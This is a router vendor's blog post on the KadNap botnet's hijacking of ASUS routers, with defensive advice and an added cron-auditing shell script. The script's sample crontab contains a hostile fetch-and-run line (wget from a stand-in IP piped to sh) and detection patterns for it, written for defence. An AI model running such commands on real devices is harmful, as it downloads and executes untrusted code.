KadNap Botnet Is Hijacking Routers: Is Yours at Risk?

Introduction

A newly discovered malware strain called KadNap is quietly turning routers and other edge networking devices into pawns in a global criminal proxy network. Security researchers at Black Lotus Labs, the threat research arm of Lumen Technologies, published findings on the botnet this week after tracking it since August 2025. With over 14,000 devices already compromised and more than 60% of victims located in the United States, this is not a distant threat. If you run an ASUS router or manage a fleet of edge devices, this one deserves your attention.


What Is KadNap?

KadNap is a botnet malware that targets routers and edge networking devices, with a particular focus on ASUS hardware. Once a device is infected, it is silently enrolled into a peer-to-peer network and used as a proxy for routing malicious traffic without the owner’s knowledge. The name comes from the malware’s use of a customized version of the Kademlia Distributed Hash Table (DHT) protocol, the same decentralized architecture used by some file-sharing networks.

This architectural choice is deliberate. Traditional botnets rely on centralized command-and-control (C2) servers, which are relatively easy for security researchers and ISPs to locate and shut down. KadNap’s P2P design means there is no single point of failure. Infected devices locate the C2 infrastructure through the DHT network itself, making it significantly harder to detect, block, and disrupt.

Once active on a device, the malware checks the device’s external IP address, queries Network Time Protocol servers for the current time and system uptime, and then installs a cron job that runs a shell script every hour at the 55-minute mark. The script is renamed “.asusrouter” on infected systems, a naming choice clearly designed to blend in with legitimate ASUS router processes.


Who Is Behind It?

Researchers have linked KadNap to a proxy service called Doppelganger, operating at doppelganger[.]shop, which markets access to infected devices as residential proxies. The service advertises proxies in over 50 countries with claims of complete anonymity, and is believed to be a rebrand of an older proxy service called Faceless, which was previously tied to the TheMoon malware botnet. TheMoon also targeted ASUS routers.

Doppelganger appears to have launched in May or June 2025, and the KadNap malware that feeds it was first detected in the wild in August 2025. Customers of these proxy services use the access for activities like DDoS attacks, credential stuffing campaigns, and brute-force attacks against other targets. The victims hosting this traffic have no idea any of it is happening.


The Scope of the Threat

As of the time of Lumen’s disclosure, KadNap had infected over 14,000 devices. More than 60% are in the United States, with additional infections in Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain. Nearly half of the botnet’s infected nodes are connected to C2 infrastructure dedicated specifically to ASUS-based bots, while the rest connect to two separate control servers.

While the current scale may seem modest compared to some botnets, KadNap’s decentralized architecture makes it unusually resilient. Lumen has taken steps to block traffic to KadNap’s known control infrastructure on its own network and has released indicators of compromise (IoCs) to help other providers and security teams do the same.


How Does It Get In?

Black Lotus Labs has not disclosed the exact initial access vector in full detail, but edge devices like routers are typically compromised through a combination of known vulnerabilities in older firmware, exposed management interfaces, and default or weak credentials. Devices running outdated firmware are especially attractive targets because many are never patched after initial deployment.

The attack chain begins with a shell script downloaded from a C2 server. That script creates the persistent cron job and enrolls the device into the P2P network. From that point forward, the device silently forwards traffic for criminal customers while the legitimate owner continues using it normally, completely unaware.


Why This Matters for Cellular and Fleet Connectivity

At 5Gstore, we work with customers who rely on ASUS routers and a wide range of edge devices in demanding deployments: fixed wireless sites, mobile command units, fleet vehicles, remote monitoring, and distributed enterprise environments. Many of these installations involve equipment that is set up once and rarely revisited for maintenance or firmware updates.

That reality is exactly what makes botnets like KadNap dangerous. A router in a remote installation running firmware from 2022 is a prime target. If that device is compromised and enrolled in a proxy botnet, the traffic implications extend beyond just the infected device. Depending on the network topology, a compromised router could become a pivot point for attackers to reach other devices on the same segment.


What You Can Do

The good news is that the core protections here are straightforward, even if they require discipline to execute across a fleet.

Update firmware immediately. ASUS and most major router manufacturers regularly push firmware updates that patch known vulnerabilities. If you have ASUS devices in your environment, log in to the admin console or your management platform and verify each device is running the latest available firmware. Automating firmware updates through a fleet management platform like RouterStatus.net is an effective way to close this gap at scale.

Change default credentials. Any device still running factory-default usernames and passwords is low-hanging fruit for attackers. Every router in your environment should have a unique, strong administrative password.

Disable remote management if not needed. Many router compromises happen through exposed web interfaces or SSH ports accessible from the internet. If you do not need remote access to a device’s management interface from outside your network, disable it. If you do need it, restrict access by IP range or use a VPN.

Audit your cron jobs and running processes. If you manage Linux-based routers and have shell access, check for unexpected cron jobs. KadNap specifically creates a persistent cron job that runs at the 55-minute mark each hour. Any cron job pulling a script from an external IP and running it should be treated as a red flag.

Segment your network. Routers and edge devices should be isolated from sensitive internal systems wherever possible. If a device is compromised, proper segmentation limits what an attacker can reach from that foothold.

Monitor outbound traffic. Unusual outbound connection volume, particularly to unfamiliar IP addresses, can be a sign of proxy traffic being routed through a device. Firewall logging and network flow analysis tools can help surface this.

Use Lumen’s IoC list. Black Lotus Labs has published indicators of compromise for KadNap. If you operate your own firewall or IDS infrastructure, adding these indicators to your block lists is a direct countermeasure.
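One way to carry out the cron audit described in these steps, as an added example that is not part of the original post or the Lumen report: a POSIX shell script that scans crontab text for the three traits the article attributes to KadNap (a job at the 55-minute mark, a script fetched from a bare IP address, and a reference to ".asusrouter"). The sample crontab is constructed, and the crontab paths in audit_live_crontabs are assumptions to adjust for your firmware.

```shell
#!/bin/sh
# Added example, not code from 5Gstore or the Black Lotus Labs report.
# Flags crontab entries showing the KadNap traits described above:
# a job at minute 55, a script fetched from a bare IP, or ".asusrouter".
# Targets BusyBox sh found on Linux-based routers; crontab paths are assumed.

# Constructed sample crontab, not captured from a real device.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /sbin/logrotate
55 * * * * /tmp/.asusrouter
*/5 * * * * /usr/sbin/ntpclient -h pool.ntp.org
30 * * * * wget -q -O- http://203.0.113.10/u.sh | sh
'

# Reads crontab text on stdin; prints REASON<TAB>entry per suspicious line.
flag_suspicious_cron() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' | while IFS= read -r line; do
        minute=$(printf '%s\n' "$line" | awk '{print $1}')
        cmd=$(printf '%s\n' "$line" | awk '{for(i=1;i<=5;i++)$i=""; sub(/^ +/,""); print}')
        reason=""
        # KadNap's hourly job fires at the 55-minute mark.
        if [ "$minute" = "55" ]; then reason="minute-55"; fi
        # Script pulled from a raw IPv4 address by wget/curl (no hostname).
        if printf '%s\n' "$cmd" | grep -Eq '(wget|curl)[^|]*https?://[0-9]{1,3}(\.[0-9]{1,3}){3}'; then
            reason="${reason:+$reason,}remote-fetch-by-ip"
        fi
        # The renamed script the report describes.
        case "$cmd" in *.asusrouter*) reason="${reason:+$reason,}asusrouter-name";; esac
        if [ -n "$reason" ]; then printf '%s\t%s\n' "$reason" "$line"; fi
    done
}

# Number of flagged entries in the constructed sample.
count_sample_flags() {
    printf '%s' "$SAMPLE_CRONTAB" | flag_suspicious_cron | wc -l | tr -d ' '
}

# Reason tags for the sample, one per line, for quick inspection.
sample_reasons() {
    printf '%s' "$SAMPLE_CRONTAB" | flag_suspicious_cron | cut -f1
}

# On a real device: run over the live crontabs (paths assumed, adjust per firmware).
audit_live_crontabs() {
    for f in /var/spool/cron/crontabs/* /etc/crontabs/* /etc/cron.d/*; do
        if [ -f "$f" ]; then flag_suspicious_cron < "$f" | sed "s|^|$f: |"; fi
    done
}
```

A hit from this script is a starting point for review, not proof of infection; confirm by inspecting the referenced script and the device's outbound connections before resetting it.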


The Bigger Picture

KadNap is part of a broader and accelerating trend of router-targeting botnets. In late 2025, the Kimwolf botnet compromised over two million Android-based TV boxes and streaming devices, also for use as residential proxies. Earlier threats like TheMoon targeted the same ASUS hardware that KadNap is now going after. These are not isolated incidents. Routers and edge devices have become a preferred attack surface because they are numerous, they are often neglected from a patching standpoint, and they sit at the boundary between a network and the open internet.

As cellular routers and 5G edge devices proliferate across industries, the stakes only increase. A botnet compromise in a fleet of cellular-connected remote monitoring nodes is not just a security problem. It is a reliability problem, a liability problem, and potentially a compliance problem depending on what data flows through those devices.


5Gstore Take

Router security is not optional, and it is not something you can address once and forget. The KadNap botnet is a sharp reminder that even well-known hardware from reputable vendors can be compromised when firmware goes unpatched and default configurations go unchanged. If you are managing ASUS routers or other edge devices and are not sure where your firmware versions stand, that is the place to start today.

If you need help selecting a router with stronger security defaults, evaluating fleet management options, or building out a more defensible network architecture, our team is ready to help. Contact us and we will work through the specifics of your deployment with you.


FAQ

What is the KadNap botnet?
KadNap is a malware strain that infects ASUS routers and other edge networking devices, enrolling them in a peer-to-peer botnet used to proxy malicious internet traffic for criminal customers.

Is my ASUS router at risk from KadNap?
If your ASUS router is running outdated firmware, uses default credentials, or has its management interface exposed to the internet, it is at elevated risk. Updating firmware and changing default passwords are the most important immediate steps.

How does KadNap avoid detection?
KadNap uses a modified version of the Kademlia Distributed Hash Table protocol to communicate in a decentralized, peer-to-peer manner. This makes it harder to find and shut down the C2 servers that control infected devices.

What should I do if I think my router is infected?
Perform a factory reset, update to the latest firmware before reconnecting, change all credentials, and disable remote management unless it is specifically required. Review the indicators of compromise published by Black Lotus Labs and apply them to your security infrastructure.

Does this affect other router brands, or just ASUS?
KadNap has primarily targeted ASUS routers, but researchers note that the malware has also been deployed against other edge networking devices. Any unpatched edge device with weak credentials or exposed management interfaces is a potential target.